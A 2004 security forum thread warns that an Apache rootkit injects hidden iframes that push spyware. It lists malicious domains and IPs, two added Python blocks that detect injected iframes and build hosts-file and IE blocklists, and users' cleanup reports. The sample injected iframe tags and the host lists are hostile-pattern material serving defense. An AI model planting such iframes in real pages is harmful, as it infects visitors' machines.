A must read


YODA74
11-30-2004, 01:06 PM
We have discovered that a group of hackers (perhaps even a criminal gang) is hacking web servers all over the Net and installing root kits that dynamically inject code into the pages served from the compromised web servers. The injected code effectively serves as a "front door" to a number of different pages at these domains:

sp2fuc**d.biz
splitinfinity.info
xpire.info

Similar to Download_Ject, only this time it works on Apache Servers rather than Windows.

Using iframes, a number of sites install anything up to 8MB worth of exploits on a user's machine - viruses, trojans, scripts, malware packages - you name it, you'll end up with it.

Several other domains are used in that installation/exploit process, including:

69.50.168.147
195.178.160.30
213.159.117.133
b00gle.info
coolsearch.biz
newiframe.biz
pizdato.biz

Fair warning: do NOT visit any of these domains unless your box is well defended and updated, and you are prepared to deal with the unexpected.

The software installed on users' PCs appears to vary. Sometimes the exploit pages listed above push porn dialers onto victims' PCs; other times a whole host of spyware and adware packages is installed. The packages that we've seen installed via this exploit include:

180solutions
BlazeFind
BookedSpace
BullsEye Networks
CashBack (Bargain Buddy)
ClickSpring
CoolWebSearch
DyFuca
Hoost
IBIS Toolbar
Internet Optimizer
ISTbar
Power Scan
SideFind
TIB Browser
WebRebates (TopMoxie)
WhenU (VVSN)
Window AdControl
WindUpdates
YourSiteBar

We have started seeing evidence of this exploit in victims' HJT logs at several anti-spyware forums -- a few samples:

»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»castlecops.com/postlite85832-sp2****ed..
»castlecops.com/postlite86439-sp2****ed..
»castlecops.com/postlite86459-sp2****ed..
»castlecops.com/postlite87626-sp2****ed..
»computercops.biz/postp364469.html
»computercops.biz/postp364553.html
»forums.tomcoyote.org/index.php?showtop..
»forums.tomcoyote.org/index.php?showtop..
»forums.tomcoyote.org/index.php?showtop..
»forum.aumha.org/viewtopic.php?t=9340
»www.trojaner-board.de/archive/index.ph..

There have been a few other public discussion threads on the Net about this exploit. In particular, see:

http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/27857

http://seclists.org/lists/fulldisclosure/2004/Oct/1031.html

Wayne Porter has some interesting comments on this exploit:

http://www.revenews.com/wayneporter/archives/000285.html#more

The worst thing is, these malware installations are just a front for massive sets of zombie boxes, and they're getting ready to point them somewhere. If you're an admin of an Apache box, PLEASE ensure that you are fully patched, especially in the area of OpenSSL exploits.

More will likely be made public in the coming weeks, but the infection is making its way round many home users' PCs, and if you end up being hijacked, nothing short of a reformat will remove the garbage from your system.

IE-Spyad will block the domains listed:

https://netfiles.uiuc.edu/ehowes/www/resource.htm

See below for more info on this:

http://www.benedelman.org/news/111804-1.html

And here:

http://www.dslreports.com/forum/remark,11904374~mode=flat

/ EDIT - this is what is potentially vulnerable....

Caldera (Apache 1.3.26)
Cobalt Sun 6.0 (Apache 1.3.12 - 1.3.20)
Conectiva 4, 4.1, 6, 7, 8 (Apache 1.3.6, 1.3.9, 1.3.12, 1.3.14, 1.3.26)
Debian GNU (Apache 1.3.12 - 1.3.20)
FreeBSD
Mandrake 7.1, 7.2, 8.0, 8.1, 8.2, 9
RedHat 5.0 up to 8.0
Slackware 7.0 up to 8.1

Please help spread the word by placing this article on your sites. As much exposure as possible is needed here.

Just in case no one has seen this yet... Damn these people never give up:mad:
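An added example, not part of YODA74's post or the advisory it reproduces, of the check an Apache admin would actually want here. Because the rootkit injects at serve time, the file in the DocumentRoot stays clean; the test is to fetch the page over HTTP, diff it against the on-disk copy, and then look at any iframe that is hidden or points at one of the hosts listed above. The two HTML documents are constructed sample input, the host list is the one from the post (masked domain omitted), and drop.example is a made-up host standing in for a target not yet on anyone's list.

```python
"""Compare what Apache actually serves with the file on disk and flag
hidden or known-bad iframes.  Added example, not code from the thread:
ON_DISK and SERVED are constructed sample input; BAD_HOSTS is the list
from the post above (the masked sp2***.biz domain left out)."""
import difflib
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Iframe targets named in the post.
BAD_HOSTS = {
    "splitinfinity.info", "xpire.info", "b00gle.info", "coolsearch.biz",
    "newiframe.biz", "pizdato.biz",
    "69.50.168.147", "195.178.160.30", "213.159.117.133",
}

# Constructed sample: the page as it sits in the DocumentRoot ...
ON_DISK = """<html><head><title>Home</title></head>
<body>
<h1>Welcome</h1>
<p>Nothing to see here.</p>
</body></html>
"""

# ... and the same page as fetched over HTTP from the compromised box:
# something in the serving path has appended two invisible iframes.
# drop.example is a made-up host not on any list.
SERVED = """<html><head><title>Home</title></head>
<body>
<h1>Welcome</h1>
<p>Nothing to see here.</p>
<iframe src="http://newiframe.biz/in.php" width="0" height="0"></iframe>
<iframe src="http://drop.example/l.php" style="display:none"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_listed(host):
    """True for a listed host or any subdomain of one."""
    return any(host == h or host.endswith("." + h) for h in BAD_HOSTS)


def is_hidden(attrs):
    """Zero-sized or CSS-hidden frames are the classic drive-by pattern."""
    style = attrs.get("style", "").replace(" ", "").lower()
    zero = {"0", "0px"}
    return (attrs.get("width", "").strip().lower() in zero
            or attrs.get("height", "").strip().lower() in zero
            or "display:none" in style
            or "visibility:hidden" in style)


def suspicious_iframes(html):
    """Return iframes that are hidden or point at a listed host."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlsplit(src).hostname or "").lower()
        listed, hidden = is_listed(host), is_hidden(attrs)
        if listed or hidden:
            hits.append({"src": src, "host": host,
                         "listed": listed, "hidden": hidden})
    return hits


def injected_lines(on_disk, served):
    """Lines present in the served copy but absent from the file on disk.
    The injection happens at serve time, so the disk copy looks clean and
    this diff, not the file, is what to inspect."""
    diff = difflib.unified_diff(on_disk.splitlines(), served.splitlines(),
                                lineterm="", n=0)
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


if __name__ == "__main__":
    for line in injected_lines(ON_DISK, SERVED):
        print("injected:", line)
    for hit in suspicious_iframes(SERVED):
        print("iframe  :", hit)
```

Run as is to see the two injected frames. Against a real server, replace SERVED with the body returned by an HTTP fetch of the same path (made from another machine, so the rootkit cannot tell the request from a visitor's) and ON_DISK with the file read from the DocumentRoot. The frame that is hidden but points at an unlisted host still gets flagged, which is exactly the case a pure domain blocklist misses.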

pentachris
11-30-2004, 01:58 PM
Thanks for the heads-up, yoda.

(BTW - the link in your signature 404's)

Donn
12-01-2004, 12:21 AM
"Just in case no one has seen this yet... Damn these people never give up" --Yoda

"There is hardly anything in the world that man cannot make
a little worse and sell a little cheaper. . . ."-John Ruskin.

There's a line in song by Sade that reads "They, they enjoy cheapness, don't show them your weakness, go on, keeping looking...."

Paleo Pete
12-01-2004, 10:46 AM
This is definitely serious stuff, thanks for the heads-up.

I think I've seen a couple of the infected machines recently, I've cleaned up 3 in the past couple of weeks that had almost everything on the list above on them. One had 1130 objects found by AdAware, the one on my bench right now had 1004 I think, and still gets an error message that I can't fix or find any info about {Explorer has caused an error in <unknown>} and after cleaning out the spyware {Explorer has caused an error in FPLKBTN.DLL}. I was already planning to call the customer this morning and recommend a reinstall, now I think it's the best idea. The FPLKBTN file does not exist on the computer, and Google turns up zero hits for both filename and error message.

Everything on the list above was on this machine except

TIB Browser
Hoost
Window AdControl

The Windows and Windows\System folders both have a bunch of highly suspicious files listed, (Running Windows ME, by the way) filenames like ouidfyfb.exe and such, usually malware files, and I've renamed a dozen known spyware executables already. (I change the extension to OLD or BAD then delete after rebooting, just in case I renamed something I shouldn't have.)

It also has bxxs5.exe which is nearly impossible to remove, a downloader trojan that AdAware listed (can't remember the name and like a dummy I didn't write it down), and a couple of things not on the list above.

The earlier computer was very close to the same, after trying to let AdAware remove everything it booted to a black screen with a blinking cursor, nothing worked at all, no Safe Mode or even boot menu, (running XP on that one) but fortunately I had already told customer a reinstall would be most likely.

Strange thing is I didn't find any porn diallers on either machine...that usually comes along with all this crud...

Donn
12-01-2004, 11:13 AM
Pete and Yoda: thanks for the info. Let me ask on behalf of the understudy types, are we dealing with a new exploit that takes advantage of known methods or paths, or a new exploit that takes advantage in new ways. If the setup for these bugs is coming through servers, then, am I correct in thinking they then have to come through the web pages, it read that way to me, and if so, could there be a registry fix to block any of this garbage?

I'm thinking along the way of what was done to prevent the Zero-Day from getting loaded. Didn't we have with zero-day, I think it was Shanmauga's, a reg hack that somehow prevented picking up that bug?* If I'm recalling that correctly--that was an awful lot for an understudy type to try to digest, and this looks impossible for me at this point, so I'm just interested in preventative measures.

Pete, I'm on a (gulp) Me OS, so what can we do, or I guess I should ask, is it even close to the point where anyone has assayed what we can start to do?

Also, since it is coming through Apache servers--are these servers used for any particular kind of websites. . .say information-based or text-based websites as opposed to graphics, or some other kind?

*If so where is that reg hack? I have since gone through a re-format and I don't have the file and the setting for it. Or am I confusing something with the reg hack for making My Computer visible in the security zones? I thought we had a reg hack that specifically prevented the entrance of the ZD into the registry.....

Well, thanks in any event. . .

PrntRhd
12-01-2004, 11:50 AM
Donn,
You are correct in the observation about infections from simply viewing a web page on one of the compromised servers.
Part of the prevention is using hosts files for the items being loaded by using programs like SpywareBlaster & IE SpyAds. The problem is the bad guys are throwing new stuff into the compromised servers and the hosts file blocking is only effective against "known" stuff.
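An added example, not part of PrntRhd's post, showing what the hosts-file approach covers and where it stops. The names come from the list in YODA74's post (masked domain omitted); the SEEN URLs are constructed. The .reg fragment uses the ZoneMap\Domains keys that IE-SPYAD-style lists populate for the Restricted Sites zone; compare it with a .reg file exported from your own machine before importing anything.

```python
"""Hosts-file and IE Restricted Sites entries for the domains in this
thread, plus a classifier that shows which requests they cannot stop.
Added example, not code from the thread.  LISTED is taken from YODA74's
post (masked domain omitted); SEEN is constructed sample input."""
import ipaddress
from urllib.parse import urlsplit

LISTED = [
    "splitinfinity.info", "xpire.info", "b00gle.info", "coolsearch.biz",
    "newiframe.biz", "pizdato.biz",
    "69.50.168.147", "195.178.160.30", "213.159.117.133",
]

# Constructed: iframe targets a victim's browser might be sent to.
# cdn.newiframe.biz and brand-new.example are made up for the example.
SEEN = [
    "http://newiframe.biz/in.php",
    "http://www.xpire.info/x.php",
    "http://69.50.168.147/dl.exe",
    "http://cdn.newiframe.biz/x.php",
    "http://brand-new.example/x.php",
]


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def hosts_entries(names, sink="127.0.0.1"):
    """hosts-file lines for every *name*.  IP literals are skipped: the
    resolver is never consulted for them, so a hosts file cannot sink them.
    hosts has no wildcards, so the bare name and www. are listed explicitly."""
    lines = []
    for name in names:
        if is_ip_literal(name):
            continue
        lines.append(f"{sink} {name}")
        lines.append(f"{sink} www.{name}")
    return lines


def restricted_zone_reg(names):
    """IE Restricted Sites (zone 4) mappings in .reg form: one
    ZoneMap\\Domains key per name with "*"=dword:4.  Assumed to match
    what IE-SPYAD writes; verify against an exported .reg before use.
    IP literals are skipped here too (they need a Ranges key instead)."""
    key = ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion"
           "\\Internet Settings\\ZoneMap\\Domains\\")
    lines = ["Windows Registry Editor Version 5.00", ""]
    for name in names:
        if is_ip_literal(name):
            continue
        lines.append(f"[{key}{name}]")
        lines.append('"*"=dword:00000004')
        lines.append("")
    return "\n".join(lines)


def classify(url, hosts_lines):
    """How a request to *url* fares on a box with *hosts_lines* installed:
    'sinkholed' (name sent to 127.0.0.1), 'ip-literal' (resolver bypassed)
    or 'unlisted' (new domain or subdomain; hosts has no wildcards)."""
    sunk = {line.split()[1].lower() for line in hosts_lines}
    host = (urlsplit(url).hostname or "").lower()
    if is_ip_literal(host):
        return "ip-literal"
    if host in sunk:
        return "sinkholed"
    return "unlisted"


if __name__ == "__main__":
    entries = hosts_entries(LISTED)
    print("\n".join(entries))
    print()
    print(restricted_zone_reg(LISTED))
    for url in SEEN:
        print(f"{classify(url, entries):10s} {url}")
```

Three blind spots fall out of the classification: an iframe that points straight at an IP address (three of the listed targets do) never touches the resolver, so no hosts entry can stop it; a hosts file has no wildcards, so cdn.newiframe.biz slips past an entry for newiframe.biz; and anything the gang stands up tomorrow is "unlisted" until someone adds it, which is PrntRhd's point.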

PrntRhd
12-01-2004, 10:01 PM
Just released:
MS just released KB889293 Cumulative Update for IE 6.0 on the Windows Update site for all current OSes.
I downloaded it and it seems to have not broken anything yet. Too soon to tell if it fixes this IFrame problem though.
:rolleyes:

PrntRhd
12-01-2004, 11:53 PM
Seems the update does not include XP SP2.

PrntRhd
12-03-2004, 11:11 AM
Just a FYI:
KB889293 broke my Win98SE PCs ability to go to secure sites, particularly my iNotes and banking sites. I removed the patch and functionality returned. I guess MS wants me to use XP-SP2?
:(

YODA74
12-04-2004, 10:01 AM
"Thanks for the heads-up, yoda. (BTW - the link in your signature 404's)" --pentachris

Ahh, that's because we had to change software. We had a couple of hacks; I'll have to fix that :rolleyes:

Paleo Pete
12-04-2004, 10:42 AM
Donn: I think there's no one "registry hack" or similar for the home user, due to the sheer number of nasties that can be installed. This exploit, if I understand it right, is installed on web servers running mostly Apache (any type of website - graphics, text; Apache is the most popular web server software) that then inject code into the webpages they store. Apache (http://httpd.apache.org/) is software designed to host webpages for local and wide area networks, and is very popular for Internet webservers. Check out the "About" link for a brief write up on the history and origin of Apache.

The average surfer will get any of a number of malware programs installed, but the exploit itself can't infect most home users' machines, since not many run web servers. So we get the payload, but not the exploit itself. Prevention is the usual drill, Spyware Blaster, IESpyads, Adaware etc and...BE CAREFUL

Running ME shouldn't make much difference, if it's kept in good shape ME runs pretty well, and is no more insecure than anything else M$ oozes out, but it has to be pampered more than 98 or XP. You're not standing in the middle of rush hour traffic, so to speak, just by running ME. This thing hits every OS that runs IE, so running an alternate browser is the best defense. I'm running Linux, even better still...and since I didn't even install Apache, it shouldn't be an issue.

Also any Windows, Linux or Unix web servers running Apache (lots of 'em out there) should be sure and get patches quick. Problem is usually they don't find out about it till we do...so by the time they know what to patch, it's already spreading.